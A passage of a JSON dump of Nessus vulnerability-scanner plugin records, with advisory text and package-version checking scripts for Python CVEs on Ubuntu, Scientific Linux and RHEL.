exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3-devel-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3.3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python3-docs-3.3.2-14.1.mbs2\")) flag++;\nif 
(rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-apps-3.3.2-14.1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:28:55", "description": "It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-26T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-06-26T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.4", "p-cpe:/a:canonical:ubuntu_linux:python2.7", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:python3.2", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2653-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2653-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84428);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 66958, 68119, 68147, 70089);\n script_xref(name:\"USN\", value:\"2653-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. 
This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2653-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2021 Canonical, Inc. / NASL script (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2-minimal\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2.7 / python2.7-minimal / python3.2 / python3.2-minimal / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:49:03", "description": "It was discovered that the Python xmlrpclib module 
did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. 
(CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular\n threads previously tried to close epoll file descriptors\n twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file\n descriptors only once.\n\n - When importing the readline module from a Python script,\n Python no longer produces erroneous random characters on\n stdout.\n\n - The cProfile utility has been fixed to print all values\n that the '-s' option supports when this option is used\n without a correct value.\n\n - The load_cert_chain() function now accepts 'None' as a\n keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been\n backported to the Python standard library, for example,\n new features of the ssl module: Server Name Indication\n (SNI) support, support for new TLSv1.x protocols, new\n hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been\n added to the ssl library.\n\n - The ssl.SSLSocket.version() method is now available to\n access information about the version of the SSL protocol\n used in a connection.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-22T00:00:00", "title": "Scientific Linux Security Update : python on SL7.x x86_64 (20151119)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-12-22T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:python-test", "p-cpe:/a:fermilab:scientific_linux:python", "p-cpe:/a:fermilab:scientific_linux:python-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-tools", "p-cpe:/a:fermilab:scientific_linux:python-devel", "p-cpe:/a:fermilab:scientific_linux:python-libs", 
"x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:tkinter", "p-cpe:/a:fermilab:scientific_linux:python-debug"], "id": "SL_20151119_PYTHON_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87570);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n\n script_name(english:\"Scientific Linux Security Update : python on SL7.x x86_64 (20151119)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. 
(CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular\n threads previously tried to close epoll file descriptors\n twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file\n descriptors only once.\n\n - When importing the readline module from a Python script,\n Python no longer produces erroneous random characters on\n stdout.\n\n - The cProfile utility has been fixed to print all values\n that the '-s' option supports when this option is used\n without a correct value.\n\n - The load_cert_chain() function now accepts 'None' as a\n keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been\n backported to the Python standard library, for example,\n new features of the ssl module: Server Name Indication\n (SNI) support, support for new TLSv1.x protocols, new\n hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been\n added to the ssl library.\n\n - The 
ssl.SSLSocket.version() method is now available to\n access information about the version of the SSL protocol\n used in a connection.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1512&L=scientific-linux-errata&F=&S=&P=10966\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d3f33a7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", 
cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T17:40:44", "description": "Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. 
(CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. 
(BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-20T00:00:00", "title": "RHEL 7 : python (RHSA-2015:2101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-11-20T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-tools", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:python", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:python-devel", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:tkinter", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:python-debuginfo", "cpe:/o:redhat:enterprise_linux:7.2", "p-cpe:/a:redhat:enterprise_linux:python-test", "p-cpe:/a:redhat:enterprise_linux:python-debug", 
"cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-libs"], "id": "REDHAT-RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/86968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86968);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"RHEL 7 : python (RHSA-2015:2101)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. 
